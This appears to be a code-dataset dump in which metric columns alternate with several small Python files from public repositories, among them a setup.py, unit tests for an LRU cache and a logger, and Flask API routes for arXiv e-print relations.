| 85
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
268f35738f3f6b89fae968f8186abaecdaac7e4f
| 63
|
py
|
Python
|
Inventory.py
|
Lawrence-JD/Journey-To-Vauss
|
532502a008c373df19243e26b6faedf27d3577ef
|
[
"MIT"
] | null | null | null |
Inventory.py
|
Lawrence-JD/Journey-To-Vauss
|
532502a008c373df19243e26b6faedf27d3577ef
|
[
"MIT"
] | null | null | null |
Inventory.py
|
Lawrence-JD/Journey-To-Vauss
|
532502a008c373df19243e26b6faedf27d3577ef
|
[
"MIT"
] | null | null | null |
# For Journey to Vauss
# ETGG 1802 Jonathan Koch
import pygame
| 15.75
| 25
| 0.777778
| 10
| 63
| 4.9
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 0.190476
| 63
| 3
| 26
| 21
| 0.882353
| 0.698413
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
cd02b0a5f7c663f787a519ccffcfa52c7fb2dbdd
| 60
|
py
|
Python
|
app/ml_tools/helpers/__init__.py
|
educauchy/kaggle-tab-playground-aug21
|
e740b251b8ab95c309255a42d32c5f105dccb35e
|
[
"MIT"
] | null | null | null |
app/ml_tools/helpers/__init__.py
|
educauchy/kaggle-tab-playground-aug21
|
e740b251b8ab95c309255a42d32c5f105dccb35e
|
[
"MIT"
] | null | null | null |
app/ml_tools/helpers/__init__.py
|
educauchy/kaggle-tab-playground-aug21
|
e740b251b8ab95c309255a42d32c5f105dccb35e
|
[
"MIT"
] | null | null | null |
from .helpers import gen_submit
from .Logging import Logging
| 30
| 31
| 0.85
| 9
| 60
| 5.555556
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 60
| 2
| 32
| 30
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
cd23f8724df764fb0aa499018ee6040f7cd988bf
| 90
|
py
|
Python
|
mather.py
|
msnilsen/hackgt2019
|
0cf9e26fa0881aa0733a58eb788469af91709823
|
[
"Apache-2.0"
] | null | null | null |
mather.py
|
msnilsen/hackgt2019
|
0cf9e26fa0881aa0733a58eb788469af91709823
|
[
"Apache-2.0"
] | null | null | null |
mather.py
|
msnilsen/hackgt2019
|
0cf9e26fa0881aa0733a58eb788469af91709823
|
[
"Apache-2.0"
] | 1
|
2020-04-06T19:33:09.000Z
|
2020-04-06T19:33:09.000Z
|
f = open("crime.csv", "r")
print("beep")
print(f.readline())
print(f.readline())
f.close()
| 18
| 26
| 0.633333
| 15
| 90
| 3.8
| 0.6
| 0.210526
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077778
| 90
| 5
| 27
| 18
| 0.686747
| 0
| 0
| 0.4
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
cd725e52d30fdc87021051e808c3a4c9fa6a50c5
| 157
|
py
|
Python
|
ui.py
|
pranavbaburaj/my-contacts
|
753bae7fc6384a8e1f59c10d0e776ba0a22c08ff
|
[
"MIT"
] | 2
|
2021-03-29T18:30:41.000Z
|
2021-04-10T17:44:38.000Z
|
ui.py
|
pranavbaburaj/my-contacts
|
753bae7fc6384a8e1f59c10d0e776ba0a22c08ff
|
[
"MIT"
] | null | null | null |
ui.py
|
pranavbaburaj/my-contacts
|
753bae7fc6384a8e1f59c10d0e776ba0a22c08ff
|
[
"MIT"
] | null | null | null |
from flaskwebgui import FlaskUI #import FlaskUI class
#You can also call the run function on FlaskUI class instantiation
FlaskUI(server='django').run()
| 31.4
| 67
| 0.783439
| 22
| 157
| 5.590909
| 0.727273
| 0.211382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152866
| 157
| 5
| 68
| 31.4
| 0.924812
| 0.541401
| 0
| 0
| 0
| 0
| 0.089552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
26b64ab1a8eae5553fb5dd8cecd25dfb8fad5bdc
| 1,517
|
py
|
Python
|
setup.py
|
nbigot/python-undoable-transaction
|
84802e512738b8f5823934b9095897ce7d245616
|
[
"MIT"
] | null | null | null |
setup.py
|
nbigot/python-undoable-transaction
|
84802e512738b8f5823934b9095897ce7d245616
|
[
"MIT"
] | null | null | null |
setup.py
|
nbigot/python-undoable-transaction
|
84802e512738b8f5823934b9095897ce7d245616
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(
name='undoable_transaction',
version='0.1.0',
packages=['undoable_transaction'],
zip_safe=True,
author='Nicolas Bigot',
author_email='nicbigot@gmail.com',
description='Undoable transaction',
long_description='Undoable transaction',
license='MIT',
keywords=['undo', 'undoable', 'transaction'],
url='https://github.com/nbigot/python-undoable-transaction',
download_url='https://github.com/nbigot/python-undoable-transaction/archive/0.1.0.tar.gz',
platforms='any',
tests_require=[
'pytest>=2.5.0'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Database',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 37
| 94
| 0.613711
| 152
| 1,517
| 6.078947
| 0.453947
| 0.22619
| 0.297619
| 0.225108
| 0.162338
| 0.103896
| 0.103896
| 0.103896
| 0
| 0
| 0
| 0.024138
| 0.235333
| 1,517
| 40
| 95
| 37.925
| 0.772414
| 0
| 0
| 0
| 0
| 0.025641
| 0.632169
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.025641
| 0
| 0.025641
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
26dc1b256cf85b3134007e48e7ff9225abcd17cc
| 117
|
py
|
Python
|
changelogs/custom/pypi/docutils.py
|
chris48s/changelogs
|
0cdb929ac4546c766cd7eef9ae4eb4baaa08f452
|
[
"MIT"
] | 54
|
2017-01-12T09:44:49.000Z
|
2022-02-01T18:15:07.000Z
|
changelogs/custom/pypi/docutils.py
|
chris48s/changelogs
|
0cdb929ac4546c766cd7eef9ae4eb4baaa08f452
|
[
"MIT"
] | 254
|
2016-12-23T12:53:52.000Z
|
2021-11-23T14:59:01.000Z
|
changelogs/custom/pypi/docutils.py
|
chris48s/changelogs
|
0cdb929ac4546c766cd7eef9ae4eb4baaa08f452
|
[
"MIT"
] | 26
|
2017-02-25T08:21:05.000Z
|
2022-01-10T15:46:24.000Z
|
def get_urls(*args, **kwargs):
return {
'http://docutils.sourceforge.net/RELEASE-NOTES.txt'
}, set()
| 23.4
| 59
| 0.606838
| 14
| 117
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 117
| 4
| 60
| 29.25
| 0.752688
| 0
| 0
| 0
| 0
| 0
| 0.418803
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0.25
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
26f17a9786f0dac24617595b4b16c518a328c27e
| 91
|
py
|
Python
|
matrix_registration/__init__.py
|
anonfloppa/matrix-registration
|
0d9c20854eb79c1dfc2ac27690b8e369111760ac
|
[
"MIT"
] | null | null | null |
matrix_registration/__init__.py
|
anonfloppa/matrix-registration
|
0d9c20854eb79c1dfc2ac27690b8e369111760ac
|
[
"MIT"
] | null | null | null |
matrix_registration/__init__.py
|
anonfloppa/matrix-registration
|
0d9c20854eb79c1dfc2ac27690b8e369111760ac
|
[
"MIT"
] | null | null | null |
from . import api
from . import config
from . import captcha
name = 'matrix_registration'
| 15.166667
| 28
| 0.758242
| 12
| 91
| 5.666667
| 0.666667
| 0.441176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175824
| 91
| 5
| 29
| 18.2
| 0.906667
| 0
| 0
| 0
| 0
| 0
| 0.208791
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f81f1ca95b833c0bf8c23add715de8fc5611517b
| 1,903
|
py
|
Python
|
Tests/LRUCache_Test.py
|
andrew-bondarenko/LRUCache
|
e36046260a3eb8d328b55374d81966b996ee6e3b
|
[
"MIT"
] | null | null | null |
Tests/LRUCache_Test.py
|
andrew-bondarenko/LRUCache
|
e36046260a3eb8d328b55374d81966b996ee6e3b
|
[
"MIT"
] | null | null | null |
Tests/LRUCache_Test.py
|
andrew-bondarenko/LRUCache
|
e36046260a3eb8d328b55374d81966b996ee6e3b
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('LRUCache')
from LRUCache import LRUCache
import unittest
class LRUCache_Test(unittest.TestCase):
def setUp(self):
self.lruCache = LRUCache()
def test_empty_cache(self):
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def test_length(self):
self.lruCache = LRUCache(2)
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.put(3,3)
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def test_get(self):
self.lruCache.put(1,1)
self.assertEqual(self.lruCache.get(1), 1, 'Should be 1')
def test_eviction(self):
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.put(3,3)
self.lruCache.put(4,4)
self.lruCache.put(5,5)
self.lruCache.put(6,6)
self.lruCache.put(7,7)
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def test_eviction_with_get(self):
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.put(3,3)
self.lruCache.put(4,4)
self.lruCache.put(5,5)
self.lruCache.get(1)
self.lruCache.put(6,6)
self.lruCache.put(7,7)
self.assertEqual(self.lruCache.get(1), 1, 'Should be 1')
self.assertEqual(self.lruCache.get(2), None, 'Should be None')
def test_delete(self):
self.lruCache.put(1,1)
self.lruCache.put(2,2)
self.lruCache.delete(1)
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
self.assertEqual(self.lruCache.get(2), 2, 'Should be 2')
def test_reset(self):
self.lruCache.put(1,1)
self.lruCache.reset()
self.assertEqual(self.lruCache.get(1), None, 'Should be None')
def tearDown(self):
self.lruCache = None
if __name__ == '__main__':
unittest.main()
| 29.276923
| 70
| 0.61587
| 275
| 1,903
| 4.192727
| 0.134545
| 0.374675
| 0.2732
| 0.210755
| 0.733738
| 0.733738
| 0.660017
| 0.65915
| 0.607112
| 0.607112
| 0
| 0.04158
| 0.241724
| 1,903
| 65
| 71
| 29.276923
| 0.75745
| 0
| 0
| 0.538462
| 0
| 0
| 0.069853
| 0
| 0
| 0
| 0
| 0
| 0.173077
| 1
| 0.173077
| false
| 0
| 0.057692
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f8b391d9ec6f333f49bd2309234babadae417cc9
| 349
|
py
|
Python
|
src/fbsrankings/query/seasons.py
|
mikee385/fbsrankings
|
2b50e26a302b53c21cd8f5c965943d6fbf0680a1
|
[
"MIT"
] | null | null | null |
src/fbsrankings/query/seasons.py
|
mikee385/fbsrankings
|
2b50e26a302b53c21cd8f5c965943d6fbf0680a1
|
[
"MIT"
] | null | null | null |
src/fbsrankings/query/seasons.py
|
mikee385/fbsrankings
|
2b50e26a302b53c21cd8f5c965943d6fbf0680a1
|
[
"MIT"
] | null | null | null |
from typing import List
from uuid import UUID
from dataclasses import dataclass
from fbsrankings.common import Query
@dataclass(frozen=True)
class SeasonResult:
id_: UUID
year: int
@dataclass(frozen=True)
class SeasonsResult:
seasons: List[SeasonResult]
@dataclass(frozen=True)
class SeasonsQuery(Query[SeasonsResult]):
pass
| 15.173913
| 41
| 0.767908
| 42
| 349
| 6.357143
| 0.5
| 0.168539
| 0.213483
| 0.269663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160458
| 349
| 22
| 42
| 15.863636
| 0.911263
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.071429
| 0.285714
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
f8c0906a59f5904626803d57a2e68ea8ffcef2ca
| 60
|
py
|
Python
|
source/__init__.py
|
mengwangk/myinvestor-toolkit
|
3dca9e1accfccf1583dcdbec80d1a0fe9dae2e81
|
[
"MIT"
] | 7
|
2019-10-13T18:58:33.000Z
|
2021-08-07T12:46:22.000Z
|
source/__init__.py
|
mengwangk/myinvestor-toolkit
|
3dca9e1accfccf1583dcdbec80d1a0fe9dae2e81
|
[
"MIT"
] | 7
|
2019-12-16T21:25:34.000Z
|
2022-02-10T00:11:22.000Z
|
source/__init__.py
|
mengwangk/myinvestor-toolkit
|
3dca9e1accfccf1583dcdbec80d1a0fe9dae2e81
|
[
"MIT"
] | 4
|
2020-02-01T11:23:51.000Z
|
2021-12-13T12:27:18.000Z
|
from .yahoo_finance import *
from .google_finance import *
| 15
| 29
| 0.783333
| 8
| 60
| 5.625
| 0.625
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 60
| 3
| 30
| 20
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
3e116ef636ed4358aec599acc482489252c99348
| 90
|
py
|
Python
|
amonguslobby/__init__.py
|
ismaeelakram/Mahjestic-Cogs
|
f0140c6aef2b5bef069cb59f76db058d05876541
|
[
"MIT"
] | 2
|
2020-12-06T10:27:28.000Z
|
2020-12-08T01:14:03.000Z
|
amonguslobby/__init__.py
|
IsmaeelAkram/Mahjestic-Cogs
|
f0140c6aef2b5bef069cb59f76db058d05876541
|
[
"MIT"
] | 1
|
2020-12-19T21:36:23.000Z
|
2020-12-19T21:36:23.000Z
|
amonguslobby/__init__.py
|
ismaeelakram/Mahjestic-Cogs
|
f0140c6aef2b5bef069cb59f76db058d05876541
|
[
"MIT"
] | 1
|
2022-03-03T19:40:22.000Z
|
2022-03-03T19:40:22.000Z
|
from .amonguslobby import AmongUsLobby
def setup(bot):
bot.add_cog(AmongUsLobby(bot))
| 22.5
| 38
| 0.777778
| 12
| 90
| 5.75
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 90
| 4
| 39
| 22.5
| 0.873418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
3e38a813b18d539e135f699a12176f77598fef09
| 92
|
py
|
Python
|
app/proto/__init__.py
|
yilongzhu/schere-api
|
1fd7e4bb080a9aed7dc57ed57d9821d3034a67ca
|
[
"MIT"
] | null | null | null |
app/proto/__init__.py
|
yilongzhu/schere-api
|
1fd7e4bb080a9aed7dc57ed57d9821d3034a67ca
|
[
"MIT"
] | 1
|
2022-03-08T21:09:30.000Z
|
2022-03-08T21:09:30.000Z
|
app/proto/__init__.py
|
yilongzhu/schere-api
|
1fd7e4bb080a9aed7dc57ed57d9821d3034a67ca
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp = Blueprint('proto', __name__)
from app.proto import routes
| 18.4
| 33
| 0.782609
| 13
| 92
| 5.230769
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141304
| 92
| 5
| 34
| 18.4
| 0.860759
| 0
| 0
| 0
| 0
| 0
| 0.053763
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 5
|
3e43cf537dd4b414cb150df8442f11f60f8ef7af
| 33
|
py
|
Python
|
z42/z42/web/mysql/orm/__init__.py
|
jumploop/collection_python
|
f66f18dc5ae50fce95679e0f4aee5e28b2543432
|
[
"MIT"
] | null | null | null |
z42/z42/web/mysql/orm/__init__.py
|
jumploop/collection_python
|
f66f18dc5ae50fce95679e0f4aee5e28b2543432
|
[
"MIT"
] | null | null | null |
z42/z42/web/mysql/orm/__init__.py
|
jumploop/collection_python
|
f66f18dc5ae50fce95679e0f4aee5e28b2543432
|
[
"MIT"
] | null | null | null |
from model import Model, ModelMc
| 16.5
| 32
| 0.818182
| 5
| 33
| 5.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 33
| 1
| 33
| 33
| 0.964286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
3e72fd1b0b89ee0d5c298da1dd3657c2c0aa2281
| 4,633
|
py
|
Python
|
offpele/tests/test_utils.py
|
cescgina/peleffy
|
fc68116dc98050ed3c2c92270d8218565d099801
|
[
"MIT"
] | null | null | null |
offpele/tests/test_utils.py
|
cescgina/peleffy
|
fc68116dc98050ed3c2c92270d8218565d099801
|
[
"MIT"
] | null | null | null |
offpele/tests/test_utils.py
|
cescgina/peleffy
|
fc68116dc98050ed3c2c92270d8218565d099801
|
[
"MIT"
] | null | null | null |
"""
This module contains the tests to check some handy classes and functions
of offpele.
"""
import pytest
import io
from contextlib import redirect_stdout
from offpele.utils import Logger
class TestLogger(object):
def test_logger_levels(self):
"""
It checks the correct behaviour of the different log levels.
"""
def push_messages(log):
"""Pull some messages at different levels."""
log.debug('Debug message')
log.info('Info message')
log.warning('Warn message')
log.error('Error message')
log.critical('Critical message')
import logging
# Initiate logger
log = Logger()
# Try the default level (INFO)
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Info message\nWarn message\n' \
+ 'Error message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try DEBUG level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try DEBUG level
log.set_level('DEBUG')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Debug message\nInfo message\n'\
+ 'Warn message\nError message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try INFO level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try INFO level
log.set_level('INFO')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Info message\nWarn message\n' \
+ 'Error message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try WARNING level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try WARNING level
log.set_level('WARNING')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Warn message\nError message\n' \
+ 'Critical message\n', \
'Unexpected logger message at standard output'
# Try ERROR level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try ERROR level
log.set_level('ERROR')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Error message\nCritical message\n', \
'Unexpected logger message at standard output'
# Try CRITICAL level
# Catch logger messages to string buffer
with io.StringIO() as buf:
# Add custom handler to logger
log_handler = logging.StreamHandler(buf)
log._logger.handlers = list()
log._logger.addHandler(log_handler)
# Try CRITICAL level
log.set_level('CRITICAL')
# Push messages
push_messages(log)
# Get string from buffer
output = buf.getvalue()
assert output == 'Critical message\n', \
'Unexpected logger message at standard output'
| 30.480263
| 72
| 0.564861
| 485
| 4,633
| 5.315464
| 0.160825
| 0.060512
| 0.040729
| 0.048875
| 0.730799
| 0.730799
| 0.730799
| 0.730799
| 0.730799
| 0.686967
| 0
| 0
| 0.361105
| 4,633
| 151
| 73
| 30.682119
| 0.870946
| 0.222102
| 0
| 0.647887
| 0
| 0
| 0.185395
| 0
| 0
| 0
| 0
| 0
| 0.084507
| 1
| 0.028169
| false
| 0
| 0.070423
| 0
| 0.112676
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
3e8073460466d3fcf5008e744f030df66bd4bc38
| 3,705
|
py
|
Python
|
relations/routes/api.py
|
arXiv/arxiv-external-links
|
a92e04fb4f9f50629e241de6d64e8aa8e2be6774
|
[
"MIT"
] | 6
|
2019-07-22T14:39:29.000Z
|
2021-11-05T12:24:36.000Z
|
relations/routes/api.py
|
arXiv/arxiv-external-links
|
a92e04fb4f9f50629e241de6d64e8aa8e2be6774
|
[
"MIT"
] | 24
|
2019-06-11T01:16:38.000Z
|
2021-06-02T00:18:51.000Z
|
relations/routes/api.py
|
arXiv/arxiv-external-links
|
a92e04fb4f9f50629e241de6d64e8aa8e2be6774
|
[
"MIT"
] | 5
|
2019-06-24T21:00:37.000Z
|
2021-11-05T12:24:29.000Z
|
"""Defines the HTTP routes and methods supported by the relations API."""
from flask import Blueprint, Response, request
from flask.json import jsonify
from .. import controllers
blueprint = Blueprint('api', __name__, url_prefix='/api')
@blueprint.route('/status', methods=['GET'])
def service_status() -> Response:
"""
Service status endpoint.
Returns ``200 OK`` if the service is up and ready to handle requests.
"""
response_data, status_code, headers = controllers.service_status(request.params)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/relations', methods=['POST'])
def create_new(arxiv_id_str: str, arxiv_ver: int) -> Response:
"""Create a new relation for an e-print."""
response_data, status_code, headers = controllers.create_new(arxiv_id_str,
arxiv_ver,
request.json)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/relations/<string:relation_id_str>', methods=['PUT'])
def supercede(arxiv_id_str: str, arxiv_ver: int, relation_id_str: str) -> Response:
"""Create a new relation for an e-print which supersedes an existing relation."""
response_data, status_code, headers = controllers.supercede(arxiv_id_str,
arxiv_ver,
relation_id_str,
request.json)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/relations/<string:relation_id_str>', methods=['DELETE'])
def suppress(arxiv_id_str: str, arxiv_ver: int, relation_id_str: str) -> Response:
"""Create a new relation for an e-print which supresses an existing relation."""
response_data, status_code, headers = controllers.suppress(arxiv_id_str,
arxiv_ver,
relation_id_str,
request.json)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>', methods=['GET'])
def get_relations(arxiv_id_str: str, arxiv_ver: int) -> Response:
"""Get all active (not suppressed or superseded) relations for an e-print."""
response_data, status_code, headers = \
controllers.retrieve(arxiv_id_str, arxiv_ver, active_only=True)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
@blueprint.route('/<string:arxiv_id_str>v<int:arxiv_ver>/log', methods=['GET'])
def get_events(arxiv_id_str: str, arxiv_ver: int) -> Response:
"""Get the complete set of relation events (including suppressed and superseded)."""
response_data, status_code, headers = \
controllers.retrieve(arxiv_id_str, arxiv_ver, active_only=False)
response: Response = jsonify(response_data)
response.status_code = status_code
response.headers.extend(headers)
return response
| 44.107143
| 113
| 0.642915
| 432
| 3,705
| 5.282407
| 0.194444
| 0.046012
| 0.065732
| 0.057844
| 0.746713
| 0.730938
| 0.713409
| 0.713409
| 0.702892
| 0.609991
| 0
| 0.001093
| 0.259109
| 3,705
| 83
| 114
| 44.638554
| 0.830237
| 0.135762
| 0
| 0.607143
| 0
| 0
| 0.09835
| 0.086929
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.053571
| 0
| 0.267857
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
